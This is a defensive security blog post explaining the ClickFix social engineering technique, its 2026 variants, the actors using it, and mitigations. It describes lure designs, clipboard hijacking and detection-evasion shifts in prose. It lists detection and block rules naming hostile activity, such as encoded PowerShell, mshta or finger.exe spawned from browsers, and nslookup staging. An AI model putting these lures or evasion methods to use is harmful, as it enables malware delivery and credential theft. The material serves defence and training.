What is ClickFix? The Social Engineering Attack That Became the #1 Initial Access Method

Updated March 2026: Added Windows terminal variant, crashfix and DNS-based delivery, MIMICRAT campaign, and compromised Chrome extension attacks from Q1 2026.

ClickFix is a social engineering technique that tricks users into running malicious commands on their own computers, bypassing security controls by making the victim the attack vector. Microsoft's 2025 Digital Defense Report confirmed ClickFix as the number one initial access method, responsible for 47% of all attacks observed by Microsoft Defender Experts, surpassing traditional phishing at 35% (Microsoft, 2025). ESET's H1 2025 Threat Report measured a 517% surge in ClickFix attacks over six months, with the technique accounting for 8% of all blocked threats (ESET, 2025).

That 47% figure should be taken seriously. Nearly half of all initial compromises Microsoft tracked last year came down to users being tricked into pasting commands. No exploit. No vulnerability. Just social engineering and a clipboard.

Get practical security insights delivered weekly. Subscribe to CyberDesserts for threat intelligence without the vendor spin.

How a ClickFix Attack Works

The core mechanic is quite simple and seems obvious now. Attackers convince users to copy and execute malicious commands through legitimate system tools.

Step 1: The fake prompt. You land on a webpage showing what looks like a CAPTCHA verification, a browser error, or a document rendering problem. Attackers clone real interfaces: Cloudflare Turnstile, Google reCAPTCHA, Microsoft authentication, and Okta login pages have all been replicated in ClickFix campaigns (Proofpoint, 2024; Unit 42, 2025).

Step 2: The clipboard hijack. When you interact with the fake prompt, malicious code is silently copied to your clipboard. The page's JavaScript has already staged the payload. Unit 42 describes this as "pastejacking" because the user is unknowingly pasting attacker-controlled commands (Palo Alto Networks, 2025).

Step 3: The execution. The prompt tells you to press Windows+R to open the Run dialogue, then Ctrl+V to paste, then Enter. That single sequence executes a PowerShell script, an mshta command, or a cmd instruction that downloads malware directly into memory. The entire attack takes seconds.

macOS and Linux users face the same technique. On macOS, users are directed to paste commands into Terminal. ESET confirmed ClickFix affects all major operating systems (ESET, 2025).

The name "ClickFix" was coined by Proofpoint researchers in 2024, reflecting how attackers almost always include buttons labelled "Fix", "How to fix", or "Fix it." From 2010 to 2015, Microsoft's own "Fix it" solutions trained users to click automated repair prompts. Attackers exploit that conditioned behaviour.

Why ClickFix Bypasses EDR and Email Security

I have worked with security teams deploying endpoint protection for over many years in a past life. The reason ClickFix is so effective is not that defences are weak. It is that the attack turns the user into the delivery mechanism.

From an EDR perspective, ClickFix looks like a user launching powershell.exe from explorer.exe. Normal behaviour. No malicious file written to disk, no suspicious parent-child process chain, no exploit triggering a detection rule. The payload executes directly in memory using living-off-the-land binaries (LOLBins) such as msbuild.exe, regasm.exe, or powershell.exe (Microsoft, 2025).

Email security scans attachments and URLs. ClickFix campaigns often contain only a clean URL that redirects through traffic distribution systems (TDS) before landing on the attack page. Browser protections like Google Safe Browsing do not trigger because the browser is not downloading an executable. The user is.

Bitdefender noted that most malicious domains have already done their damage and been abandoned before any blocklist catches up (Bitdefender, 2025). Attackers spin up new domains faster than reputation services can flag them.

New ClickFix Variants in 2026: CrashFix, DNS Delivery, and MIMICRAT

The technique is not standing still. Three significant evolutions have emerged in 2026.

CrashFix: Breaking Your Browser on Purpose

In January 2026, Huntress identified a new ClickFix variant they named CrashFix, delivered through a malicious Chrome extension called NexShield that impersonated the legitimate uBlock Origin Lite ad blocker (Huntress, 2026). The attack deliberately crashes the victim's browser by flooding the browser with chrome.runtime port connections in a loop that burns through available memory until Chrome or Edge stops responding.

After the user force-closes and restarts, a professional-looking security warning claims the browser "stopped abnormally" and recommends a scan. The fake alert leads to the familiar ClickFix execution: Win+R, Ctrl+V, Enter. The clipboard already holds the payload.

Microsoft Defender Experts called CrashFix a "notable escalation in ClickFix tradecraft" because it creates a genuine technical problem rather than faking one (Microsoft Security Blog, 2026).

The final payload is ModeloRAT, a previously undocumented Python-based RAT. KongTuke, the threat actor behind CrashFix, deliberately targets domain-joined machines, deploying ModeloRAT only on corporate endpoints with Active Directory access. Non-domain machines receive incomplete test payloads. That distinction tells you exactly what they are after: corporate networks where one compromised machine opens the door to lateral movement (Huntress, 2026).

ClickFix via DNS: The Nslookup Variant

In February 2026, Microsoft disclosed a variant using nslookup to retrieve payloads through DNS queries rather than traditional web requests (Microsoft Security Blog, 2026). The victim runs a command that performs a DNS lookup against a hard-coded external server. The response contains encoded instructions that stage the next phase of the attack.

DNS as a delivery channel works because most organisations do not scrutinise DNS response payloads, letting attack traffic hide inside routine lookups. The attack chain delivers ModeloRAT through a ZIP archive containing a portable Python interpreter, establishing persistence through Windows Startup folder shortcuts.

ClickFix Through Compromised Websites

Also in February 2026, Elastic Security documented a campaign abusing bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was breached to inject malicious JavaScript (The Hacker News, 2026). The compromised site displayed a fake Cloudflare verification page delivering a previously undocumented RAT called MIMICRAT (also known as AstarionRAT). The attack chain patched Windows Event Tracing (ETW) to disable logging, a significant evasion technique.

This campaign shares infrastructure overlaps with attacks documented by Huntress that delivered the Matanbuchus 3.0 loader, suspected to enable ransomware deployment or data exfiltration.

ClickFix via Windows Terminal: Bypassing Run Dialogue Detections

On 6 March 2026, Microsoft Threat Intelligence disclosed a campaign observed in February that replaces the familiar Win+R shortcut with Win+X followed by I, which launches Windows Terminal (wt.exe) directly. The shift is deliberate. Security teams that built detection rules around suspicious activity from the Run dialogue now miss this variant entirely.

Windows Terminal is a legitimate administrative tool that developers and sysadmins open routinely. From a SIEM perspective, a user launching wt.exe and running PowerShell inside it looks like a normal workflow. The payload itself uses commands encoded in hex and compressed with XOR, which chain through multiple PowerShell processes to unpack and run the payload. The attack chain downloads a renamed 7-Zip binary to extract a multi-stage payload that adds Microsoft Defender exclusions, collects system and browser data, and ultimately deploys Lumma Stealer. Lumma Stealer then hooks into Chrome and Edge browser processes through the QueueUserAPC() API to extract saved login credentials (Microsoft Threat Intelligence, 2026).

A second infection path uses EtherHiding, a technique that leverages blockchain smart contracts for command-and-control communications, making traditional domain blocking ineffective.

For defenders, this variant means detection rules must now cover wt.exe as a parent process for suspicious PowerShell activity, not just explorer.exe or the Run dialogue.

Which Threat Actors Use ClickFix

ClickFix emerged in early 2024 from cybercriminal operations, first documented by Proofpoint in campaigns by the initial access broker TA571 and the ClearFake malware cluster (Proofpoint, 2024). Adoption was rapid.

Cybercriminal campaigns now deliver a wide range of payloads. Lumma Stealer is the most common final payload based on Microsoft's observations, responsible for 51% of infections. Other regularly delivered malware includes DarkGate, AsyncRAT, Xworm, NetSupport RAT, Latrodectus loader, and the Amatera and Rhadamanthys infostealers (Microsoft, 2025). ClickFix builders are now sold commercially, providing weaponised landing pages ready to deploy (ESET, 2025).

Underground markets sell ClickFix kits for $200 to $1,500 monthly, with customisable lures, VM detection bypass, and UAC evasion included. (GBHackers)

Nation-state adoption began in late 2024. Proofpoint documented campaigns from four state-sponsored groups within a three-month window:

• Kimsuky (North Korea) targeted think tanks researching North Korean policy, impersonating a Japanese diplomat to build trust before delivering QuasarRAT
• MuddyWater (Iran) impersonated Microsoft security updates, timing phishing emails to coincide with Patch Tuesday
• APT28 (Russia) used fake Google Spreadsheet prompts with reCAPTCHA-style verification
• UNK_RemoteRogue (Russia) targeted defence contractors through compromised Zimbra servers

(Proofpoint, 2025)

When nation-state actors adopt a criminal technique this quickly, they are telling you it works against hardened targets. That is the part that should concern security teams more than the volume numbers.

Enterprise targeting is accelerating. Unit 42 reported assisting in nearly a dozen incident response cases where ClickFix was the initial access vector, impacting organisations across technology, financial services, professional services, and manufacturing (Palo Alto Networks, 2025). The Storm-1865 campaign impersonated Booking.com to target hospitality organisations across North America, Europe, and Asia.

Common ClickFix Lures in 2026

Attackers continuously refine their social engineering. Current campaigns use these pretexts:

• Fake CAPTCHAs cloning Cloudflare Turnstile, Google reCAPTCHA, and similar verification pages
• Browser crash recovery (CrashFix variant) creating genuine browser failures then offering a "fix"
• Browser update prompts claiming the page requires an update to display correctly
• Document viewer errors requiring a "plugin" to view PDF or Word files
• Video conferencing issues impersonating Google Meet or Zoom with "fix your audio/video" prompts
• Enterprise login pages cloning DocuSign, Okta, and other business services (Unit 42, 2025)
• Compromised Chrome extensions such as QuickLens (February 2026) injecting ClickFix prompts into fake Google Update alerts (Bleeping Computer, 2026)
• Social media verification scams instructing users to copy authentication tokens for supposed verified badge eligibility (Hunt.io, 2025)
• Social Security Administration notices about supposed account issues (observed June 2025)

The QuickLens case is worth highlighting. A legitimate extension with thousands of users changed ownership in February 2026. The new owner pushed version 5.8, which stripped browser security headers and introduced ClickFix attacks alongside cryptocurrency wallet theft (Bleeping Computer, 2026). If you think "I only install extensions from the Chrome Web Store," that protection is no longer sufficient.

ClickFix MITRE ATT&CK Techniques

ClickFix maps to several MITRE ATT&CK techniques across the attack chain:

• T1204.002 (User Execution: Malicious File) - The victim manually executes the malicious command
• T1059.001 (Command and Scripting Interpreter: PowerShell) - Primary execution mechanism on Windows
• T1059.002 (AppleScript) - Execution mechanism on macOS
• T1218.005 (System Binary Proxy Execution: mshta.exe) - Proxies execution through trusted binaries
• T1115 (Clipboard Data) - Clipboard hijacking stages the payload
• T1027 (Obfuscated Files or Information) - PowerShell commands are typically Base64-encoded
• T1071.004 (Application Layer Protocol: DNS) - The February 2026 nslookup variant uses DNS for payload delivery

The reliance on user execution (T1204) is precisely why automated defences struggle. MITRE classifies this as an "execution" technique, not "initial access," because the user is the execution engine.

How to Defend Against ClickFix Attacks

No single control stops ClickFix. Here is what works based on what I have seen deployed successfully.

How to Block ClickFix with Group Policy and WDAC

Restrict PowerShell and script execution for standard users through Group Policy or Windows Defender Application Control (WDAC). This is the highest-impact single control. If non-administrative users cannot execute PowerShell, the most common ClickFix payload fails. Class this as high priority, it helps across a lot of payload scenarios including new variants.

Block or monitor LOLBin abuse. Configure AppLocker or WDAC rules for mshta.exe, wscript.exe, cscript.exe, and finger.exe. Microsoft specifically recommended restricting outbound access for the finger utility (TCP port 79) after observing it abused in CrashFix campaigns (Microsoft Security Blog, 2026).

Enable PowerShell Script Block Logging. Non-negotiable. Without it, you have no forensic visibility into what ClickFix payloads executed. Enable Module Logging, Script Block Logging, and Transcription logging through Group Policy.

Monitor clipboard-to-terminal patterns. Alert on sequences of Win+R followed by PowerShell or cmd execution within short timeframes. This is anomalous for most business users.

Deploy DNS monitoring. The nslookup variant uses DNS as a staging channel. Monitor for nslookup commands executed from user-initiated processes targeting external DNS servers.

Review browser extension policies. After the NexShield and QuickLens incidents, restrict extension installation to approved lists where feasible. Monitor for extensions requesting unusual permissions like declarativeNetRequestWithHostAccess.

What to Train Employees About ClickFix

Technical controls reduce the attack surface. Training addresses the root cause.

The core message fits on a poster: Legitimate websites never ask you to open Run, PowerShell, or Terminal. If a website tells you to press Win+R or paste a command, close it and report it.

Reinforce these points:

• CAPTCHA verification never requires running system commands
• Browser errors do not require pasting code to fix
• No website needs access to your clipboard, Run dialogue, or Terminal
• If your browser crashes and immediately offers a "scan," that is suspicious

Microsoft recommends building specific playbooks for ClickFix rather than relying on generic phishing awareness (Microsoft MDDR, 2025). The attack is different enough from email phishing that existing training may not cover it.

How to Detect ClickFix in Your SIEM

For organisations running SIEM platforms, these detection opportunities have proven effective:

• Alert on PowerShell execution initiated from the Windows Run dialogue (explorer.exe > powershell.exe with specific command-line patterns)
• Monitor for encoded PowerShell commands (Base64 strings in command-line arguments)
• Flag HTTP requests with PowerShell user agents to external infrastructure
• Detect mshta.exe or finger.exe spawned from browser processes
• Monitor for SyncAppvPublishingServer.vbs execution, abused in recent campaigns to proxy PowerShell through a signed Microsoft component (Blackpoint, 2026)
• Alert on Windows Terminal (wt.exe) spawning PowerShell with encoded or hex-encoded command-line arguments, particularly when preceded by user-initiated Win+X keyboard shortcuts

Florian Roth (Nextron Systems) and other detection engineers have published Sigma rules targeting ClickFix behaviour patterns. For ELK-based detection implementation, see our ELK Stack Security Monitoring Tutorial.

Building your security skills? Our Cybersecurity Skills Roadmap covers detection engineering fundamentals and career pathways.

Summary

ClickFix represents a shift I have seen develop over many years: from breaking systems to exploiting people. The industry spent billions on endpoint protection, and attackers responded by making the endpoint user the delivery mechanism. First observed in March 2024. Adopted by nation-state groups by late 2024. Named the number one initial access method by Microsoft in 2025. Evolving into CrashFix, DNS-based delivery, and compromised extension attacks in 2026. Builders are now commercially available, lowering the barrier for any attacker.

The defence requires three things: restrict script execution for standard users, train people to recognise these specific lures, and build detection rules for the execution patterns. If you have not done all three, you are exposed to the most common initial access technique currently observed.

For a broader view of how social engineering techniques like ClickFix fit into the current threat landscape, see our AI Security Threats guide. For more on the infostealers that ClickFix commonly delivers, see our breakdown of what infostealers are and how they work.

ClickFix campaigns evolve weekly. Subscribers get practical analysis when new variants emerge, plus weekly security insights. No sales pitches, no fluff.

Last updated: March 2026

Frequently Asked Questions

What is ClickFix?

ClickFix is a social engineering technique that tricks users into executing malicious commands on their own computers. Attackers use fake CAPTCHA prompts, browser errors, or document viewer problems to convince victims to open the Windows Run dialogue and paste a PowerShell command that has been silently copied to their clipboard. Microsoft identified ClickFix as the number one initial access method in 2025, responsible for 47% of observed attacks.

How does a ClickFix attack work?

The attack follows three steps. First, a fake prompt appears on a webpage claiming the user needs to verify their identity or fix a problem. Second, malicious code is silently copied to the user's clipboard through JavaScript on the page. Third, the user is instructed to press Windows+R, Ctrl+V, and Enter, which executes the hidden malicious command. The entire sequence takes seconds and bypasses most automated security controls because the user initiates the execution.

What malware does ClickFix deliver?

The most common payload is Lumma Stealer, responsible for 51% of observed infections (Microsoft, 2025). Other frequently delivered malware includes DarkGate, AsyncRAT, Xworm, NetSupport RAT, Latrodectus loader, ModeloRAT, and MIMICRAT. Recent campaigns have also delivered ransomware-enabling payloads.

Can ClickFix target Mac and Linux users?

Yes. ClickFix affects all major operating systems. macOS campaigns direct users to paste commands into Terminal instead of the Windows Run dialogue, delivering Atomic macOS Stealer (AMOS) and other payloads. Linux systems are also targeted through terminal-based command execution. ESET confirmed cross-platform targeting in their H1 2025 report.

What is CrashFix?

CrashFix is a ClickFix variant identified by Huntress in January 2026. It uses a malicious Chrome extension that deliberately crashes the browser, then displays a fake security warning offering to "fix" the problem. Unlike standard ClickFix which fakes errors, CrashFix creates a genuine browser crash, making the social engineering more convincing. It delivers ModeloRAT and specifically targets corporate domain-joined machines.

How do I protect my organisation against ClickFix?

The most effective defence combines three measures: restrict PowerShell and script execution for non-administrative users through Group Policy or WDAC, train employees that legitimate verification prompts never require running system commands, and deploy detection rules for ClickFix execution patterns. Microsoft recommends building ClickFix-specific response playbooks rather than relying on generic phishing training.

Are nation-states using ClickFix?

Yes. Proofpoint documented ClickFix campaigns from Kimsuky (North Korea), MuddyWater (Iran), APT28 (Russia), and UNK_RemoteRogue (Russia) targeting government, defence, and think tank organisations between late 2024 and early 2025. The rapid adoption by state-sponsored groups confirms the technique's effectiveness against security-aware targets.

Is ClickFix the same as phishing?

ClickFix is a form of social engineering but differs from traditional phishing. Phishing typically delivers malware through email attachments or malicious links that trigger automatic downloads. ClickFix requires the user to manually execute the command through a system tool like PowerShell or Terminal. Many email security controls that catch phishing do not detect ClickFix because the execution originates from a trusted user action.

References and Sources

1. Microsoft. (2025). 2025 Digital Defense Report. ClickFix identified as the number one initial access method, accounting for 47% of observed attacks by Defender Experts. Traditional phishing accounted for 35%.
2. ESET. (2025). H1 2025 Threat Report. ClickFix attacks increased 517%, accounting for 8% of blocked attacks. Confirmed ClickFix builders are sold commercially.
3. Proofpoint. (2025). Around the World in 90 Days: State-Sponsored Actors Try ClickFix. Documentation of nation-state adoption by Kimsuky, MuddyWater, APT28, and UNK_RemoteRogue.
4. Proofpoint. (2024). ClickFix Social Engineering Technique Floods Threat Landscape. Initial documentation of ClickFix emergence by TA571 and ClearFake cluster.
5. Huntress. (2026). Dissecting CrashFix: KongTuke's New Toy. Discovery of CrashFix variant, NexShield malicious extension, and ModeloRAT deployment targeting corporate environments.
6. Microsoft Security Blog. (2026). New ClickFix Variant "CrashFix" Deploying Python Remote Access Trojan. Technical analysis of CrashFix as a notable escalation in ClickFix tradecraft.
7. Microsoft Security Blog. (2026). DNS-Based ClickFix Attack Using Nslookup for Malware Staging. Disclosure of nslookup-based ClickFix variant using DNS as a delivery channel.
8. Microsoft Security Blog. (2025). Think Before You Click(Fix). Comprehensive technical analysis of ClickFix campaigns including LOLBin abuse and fileless payload delivery.
9. Palo Alto Networks Unit 42. (2025). Fix the Click: Preventing the ClickFix Attack Vector. Unit 42 assisted in nearly a dozen IR cases with ClickFix as initial access.
10. Elastic Security. (2026). MIMICRAT campaign analysis via compromised bincheck[.]io site deploying previously undocumented RAT with ETW patching.
11. Bleeping Computer. (2026). QuickLens Chrome Extension Steals Crypto, Shows ClickFix Attack. Compromised extension introduced ClickFix attacks and crypto wallet theft in version 5.8 update.
12. Blackpoint. (2026). ClickFix campaign abusing SyncAppvPublishingServer.vbs (signed Microsoft App-V script) to distribute Amatera infostealer.
13. Bitdefender. (2025). ClickFix: A KISS from Cybercriminals. Analysis of EDR detection challenges and Lumma Stealer delivery through ClickFix.
14. Kaspersky. (2026). Variations of the ClickFix. Documentation of finger.exe abuse, ad blocker impersonation, and expanded lure types.
15. Microsoft Threat Intelligence. (2026). ClickFix campaign using Windows Terminal (wt.exe) to deliver Lumma Stealer via hex-encoded PowerShell commands and QueueUserAPC injection. Disclosed 6 March 2026.